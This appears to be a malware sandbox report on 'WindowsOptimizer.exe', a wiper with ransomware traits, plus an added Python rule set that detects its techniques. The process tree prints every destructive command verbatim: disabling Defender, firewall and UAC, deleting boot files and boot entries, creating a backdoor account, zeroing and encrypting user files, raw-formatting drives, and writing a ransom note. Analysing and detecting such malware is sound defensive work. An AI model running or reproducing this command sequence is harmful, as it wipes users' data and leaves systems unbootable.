Analysis

  • max time kernel
    2s
  • max time network
    3s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-11-2024 21:27

General

  • Target

    WindowsOptimizer.exe

  • Size

    254KB

  • MD5

    5aaa262b518a3417e028e001152c9236

  • SHA1

    6d1cda51302d760509822b502a8f980537d17cb0

  • SHA256

    d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b

  • SHA512

    722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca

  • SSDEEP

    3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 5 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. On this page the signature is attached to netsh advfirewall set allprofiles state off (PID 2748), which changes firewall state but registers no helper DLL; the Modifies Windows Firewall signature on the same process is the relevant one.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems. The single IoC here is the fsutil.exe command zeroing C:\Users\Admin\Desktop\PingConvertTo.mp4v (PID 352); the file name is the only network-related token on that line, so treat this hit as a keyword false positive rather than evidence of a connectivity check.

  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
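The signatures above are the sandbox's verdicts; what a detection engineer usually wants is a rule set that reproduces them from process-creation telemetry. The Python below is an added example, not part of this report or of the sample: it strips the cmd.exe /c wrapper so that parent and child are judged on the same payload, matches the unwrapped command line against one regex per technique seen in the process tree on this page, and escalates to a wiper verdict when recovery is inhibited (T1490) and boot or disk structures are wiped (T1561.002). The rule names, tactic labels, regexes and the benign control event (PID 4242) are this example's own assumptions; the sample events are constructed by transcribing command lines from this report.

```python
import re
from typing import Dict, List

# Added example (not from the sandbox report or the sample). Rule names, tactic
# labels and regexes are this example's own assumptions; ATT&CK IDs are standard.
# (rule name, ATT&CK technique, tactic, regex applied to the unwrapped command line)
RULES = [
    ("defender_disabled_by_policy", "T1562.001", "defense-evasion",
     r"\breg\s+add\s+.*windows defender.*\/v\s+disableantispyware\s+.*\/d\s+1\b"),
    ("firewall_all_profiles_off", "T1562.004", "defense-evasion",
     r"\bnetsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b"),
    ("uac_disabled_enablelua", "T1548.002", "privilege-escalation",
     r"\breg\s+add\s+.*policies\\system\s+\/v\s+enablelua\s+.*\/d\s+0\b"),
    ("windows_update_service_stopped", "T1489", "impact",
     r"\bsc\s+(?:stop|config)\s+wuauserv\b"),
    ("taskmgr_or_regedit_disabled", "T1562.001", "defense-evasion",
     r"\/v\s+(?:disabletaskmgr|disableregistrytools)\s+.*\/d\s+1\b"),
    ("system_restore_disabled", "T1490", "impact",
     r"systemrestore.*\/v\s+disablesr\s+.*\/d\s+1\b"),
    ("boot_recovery_disabled", "T1490", "impact",
     r"\bbcdedit\s+\/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"),
    ("boot_entry_deleted", "T1490", "impact",
     r"\bbcdedit\s+\/delete\s+\{(?:bootmgr|default|current)\}"),
    ("local_account_created", "T1136.001", "persistence",
     r"\bnet1?\s+user\s+\S+\s+\S+\s+\/add\b"),
    ("boot_files_deleted", "T1561.002", "impact",
     r"\bdel\s+.*(?:winload\.exe|\\bootmgr\b|\\efi\\microsoft\\boot\\)"),
    ("system32_dlls_deleted", "T1485", "impact",
     r"\bdel\s+.*system32\\\*\.dll"),
    ("efs_encrypt_user_data", "T1486", "impact",
     r"\bcipher\s+\/e\b"),
    ("file_contents_zeroed", "T1485", "impact",
     r"\bfsutil\s+file\s+setzerodata\b"),
    ("efi_partition_mounted", "T1561.002", "impact",
     r"\bmountvol\s+[a-z]:\s+\/s\b"),
    ("raw_format_of_volume", "T1561.002", "impact",
     r"\bformat\s+[a-z]:\s+\/fs:raw\b"),
]
COMPILED = [(n, t, tac, re.compile(rx, re.IGNORECASE)) for n, t, tac, rx in RULES]

# Leading `C:\...\cmd.exe /c ` or `cmd.exe /c `; the payload after it is what matters.
_CMD_WRAPPER = re.compile(r'^\s*"?(?:[a-z]:\\[^"\s]*\\)?cmd(?:\.exe)?"?\s+/c\s+', re.IGNORECASE)

def unwrap(cmdline: str) -> str:
    """Strip a cmd.exe /c wrapper so parent and child are judged on the same payload."""
    return _CMD_WRAPPER.sub("", cmdline)

def classify(cmdline: str) -> List[str]:
    """Return the names of every rule the unwrapped command line matches."""
    payload = unwrap(cmdline)
    return [name for name, _, _, rx in COMPILED if rx.search(payload)]

def triage(events: List[Dict]) -> Dict:
    """Aggregate per-event hits into techniques and a verdict for the whole tree."""
    hits: Dict[str, List[int]] = {}
    for ev in events:
        for name in classify(ev["cmdline"]):
            hits.setdefault(name, []).append(ev["pid"])
    techniques = {tech for name, tech, _, _ in COMPILED if name in hits}
    tactics = {tac for name, _, tac, _ in COMPILED if name in hits}
    # Recovery inhibition plus a disk-structure wipe is the wiper pattern:
    # the host cannot boot and nothing is left to restore from.
    if "T1490" in techniques and "T1561.002" in techniques:
        verdict = "destructive: recovery inhibited and boot/disk structures wiped"
    elif "impact" in tactics:
        verdict = "impact"
    elif tactics:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "techniques": sorted(techniques), "verdict": verdict}

# Constructed process-creation records (Sysmon Event ID 1 fields) transcribed from
# this report's process tree; not real log output. PID 4242 is a made-up benign control.
SAMPLE_EVENTS = [
    {"pid": 1812, "cmdline": r'C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"pid": 1772, "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"pid": 2748, "cmdline": r"netsh advfirewall set allprofiles state off"},
    {"pid": 2808, "cmdline": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"pid": 3004, "cmdline": r"sc stop wuauserv"},
    {"pid": 2736, "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"},
    {"pid": 2944, "cmdline": r"bcdedit /set {default} recoveryenabled No"},
    {"pid": 2204, "cmdline": r"C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add"},
    {"pid": 2656, "cmdline": r"C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe"},
    {"pid": 1956, "cmdline": r"cipher /E /A /S:C:\Users\Admin\Desktop"},
    {"pid": 2680, "cmdline": r'fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"'},
    {"pid": 2652, "cmdline": r"bcdedit /delete {bootmgr} /f"},
    {"pid": 2224, "cmdline": r"mountvol X: /s"},
    {"pid": 2488, "cmdline": r"C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*"},
    {"pid": 2880, "cmdline": r"format C: /fs:raw /q /y"},
    {"pid": 4242, "cmdline": r"C:\Windows\system32\ipconfig.exe /all"},
]

if __name__ == "__main__":
    summary = triage(SAMPLE_EVENTS)
    for name, pids in summary["hits"].items():
        print(f"{name:32} pids={pids}")
    print(summary["verdict"], summary["techniques"])
```

Every rule anchors on the executable name and its switches rather than on loose tokens; that is the difference between these rules and the keyword hit this report records against PingConvertTo.mp4v. The fsutil setZeroData and cipher /E rules matter because neither action deletes a file, so a detection built only on file-deletion events would miss the data destruction that precedes the format.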

Processes

  • C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
    "C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
          PID:1772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2748
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          • Modifies registry key
          PID:2808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop wuauserv
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:3004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\system32\sc.exe
          sc config wuauserv start=disabled
          3⤵
          • Launches sc.exe
          PID:2728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:2736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
          3⤵
          • Disables RegEdit via registry modification
          • Modifies registry key
          PID:2876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
          3⤵
            PID:2764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2636
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
            3⤵
              PID:2856
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2892
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} recoveryenabled No
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:2944
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1576
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} bootstatuspolicy ignoreallfailures
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:2740
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
            2⤵
              PID:2716
              • C:\Windows\system32\net.exe
                net user TrojanUser0 ComplexPass123! /add
                3⤵
                  PID:2632
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
                    4⤵
                      PID:2204
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
                  2⤵
                    PID:2656
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
                    2⤵
                      PID:2600
                      • C:\Windows\system32\cipher.exe
                        cipher /E /A /S:C:\Users\Admin\Desktop
                        3⤵
                          PID:1956
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                        2⤵
                          PID:2596
                          • C:\Windows\system32\fsutil.exe
                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"
                            3⤵
                              PID:2680
                            • C:\Windows\system32\fsutil.exe
                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"
                              3⤵
                                PID:2472
                              • C:\Windows\system32\fsutil.exe
                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"
                                3⤵
                                  PID:2196
                                • C:\Windows\system32\fsutil.exe
                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"
                                  3⤵
                                    PID:2884
                                  • C:\Windows\system32\fsutil.exe
                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"
                                    3⤵
                                      PID:2232
                                    • C:\Windows\system32\fsutil.exe
                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"
                                      3⤵
                                        PID:2220
                                      • C:\Windows\system32\fsutil.exe
                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"
                                        3⤵
                                          PID:2312
                                        • C:\Windows\system32\fsutil.exe
                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"
                                          3⤵
                                            PID:1644
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"
                                            3⤵
                                              PID:2888
                                            • C:\Windows\system32\fsutil.exe
                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"
                                              3⤵
                                                PID:536
                                              • C:\Windows\system32\fsutil.exe
                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"
                                                3⤵
                                                  PID:2352
                                                • C:\Windows\system32\fsutil.exe
                                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"
                                                  3⤵
                                                    PID:2780
                                                  • C:\Windows\system32\fsutil.exe
                                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"
                                                    3⤵
                                                      PID:1912
                                                    • C:\Windows\system32\fsutil.exe
                                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"
                                                      3⤵
                                                        PID:2372
                                                      • C:\Windows\system32\fsutil.exe
                                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"
                                                        3⤵
                                                          PID:660
                                                        • C:\Windows\system32\fsutil.exe
                                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"
                                                          3⤵
                                                            PID:840
                                                          • C:\Windows\system32\fsutil.exe
                                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"
                                                            3⤵
                                                              PID:2052
                                                            • C:\Windows\system32\fsutil.exe
                                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"
                                                              3⤵
                                                                PID:1508
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"
                                                                3⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                PID:352
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"
                                                                3⤵
                                                                  PID:908
                                                                • C:\Windows\system32\fsutil.exe
                                                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"
                                                                  3⤵
                                                                    PID:688
                                                                  • C:\Windows\system32\fsutil.exe
                                                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"
                                                                    3⤵
                                                                      PID:2584
                                                                    • C:\Windows\system32\fsutil.exe
                                                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"
                                                                      3⤵
                                                                        PID:2332
                                                                      • C:\Windows\system32\fsutil.exe
                                                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"
                                                                        3⤵
                                                                          PID:1048
                                                                        • C:\Windows\system32\fsutil.exe
                                                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"
                                                                          3⤵
                                                                            PID:2456
                                                                          • C:\Windows\system32\fsutil.exe
                                                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"
                                                                            3⤵
                                                                              PID:2284
                                                                            • C:\Windows\system32\fsutil.exe
                                                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"
                                                                              3⤵
                                                                                PID:2268
                                                                              • C:\Windows\system32\fsutil.exe
                                                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"
                                                                                3⤵
                                                                                  PID:2248
                                                                                • C:\Windows\system32\fsutil.exe
                                                                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"
                                                                                  3⤵
                                                                                    PID:3008
                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"
                                                                                    3⤵
                                                                                      PID:3012
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
                                                                                    2⤵
                                                                                      PID:2616
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
                                                                                      2⤵
                                                                                        PID:2668
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
                                                                                        2⤵
                                                                                          PID:2336
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit /delete {bootmgr} /f
                                                                                            3⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:2652
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
                                                                                          2⤵
                                                                                            PID:1620
                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                              bcdedit /delete {default} /f
                                                                                              3⤵
                                                                                              • Modifies boot configuration data using bcdedit
                                                                                              PID:2972
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c mountvol X: /s
                                                                                            2⤵
                                                                                              PID:1744
                                                                                              • C:\Windows\system32\mountvol.exe
                                                                                                mountvol X: /s
                                                                                                3⤵
                                                                                                  PID:2224
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
                                                                                                2⤵
                                                                                                  PID:2488
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c mountvol X: /d
                                                                                                  2⤵
                                                                                                    PID:2452
                                                                                                    • C:\Windows\system32\mountvol.exe
                                                                                                      mountvol X: /d
                                                                                                      3⤵
                                                                                                      • Enumerates connected drives
                                                                                                      PID:1792
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
                                                                                                    2⤵
                                                                                                      PID:1788
                                                                                                      • C:\Windows\system32\format.com
                                                                                                        format C: /fs:raw /q /y
                                                                                                        3⤵
                                                                                                          PID:2880
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
                                                                                                        2⤵
                                                                                                          PID:1712
                                                                                                          • C:\Windows\system32\format.com
                                                                                                            format D: /fs:raw /q /y
                                                                                                            3⤵
                                                                                                            • Enumerates connected drives
                                                                                                            PID:2144
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
                                                                                                          2⤵
                                                                                                            PID:1280
                                                                                                            • C:\Windows\system32\format.com
                                                                                                              format E: /fs:raw /q /y
                                                                                                              3⤵
                                                                                                              • Enumerates connected drives
                                                                                                              PID:1996
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
                                                                                                            2⤵
                                                                                                              PID:2896
                                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                                bcdedit /delete {current} /f
                                                                                                                3⤵
                                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                                PID:2344
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                              2⤵
    PID:2176
• C:\Windows\system32\cmd.exe
  cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:2016
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:2252
• C:\Windows\system32\cmd.exe
  cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:748
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:2172
• C:\Windows\system32\cmd.exe
  cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:1272
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:1604
• C:\Windows\system32\cmd.exe
  cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:904
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:2428
• C:\Windows\system32\cmd.exe
  cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
  2⤵
    PID:2228
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
  2⤵
    PID:2216
• C:\Windows\system32\cmd.exe
  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
  2⤵
    PID:560
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
  2⤵
    PID:2212
• C:\Windows\system32\cmd.exe
  cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
  2⤵
    PID:2528
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
  2⤵
    PID:3028
• C:\Windows\system32\efsui.exe
  efsui.exe /efs /keybackup
  1⤵
  • Suspicious use of FindShellTrayWindow
  • Suspicious use of SendNotifyMessage
    PID:2852

Network

MITRE ATT&CK Enterprise v15

Downloads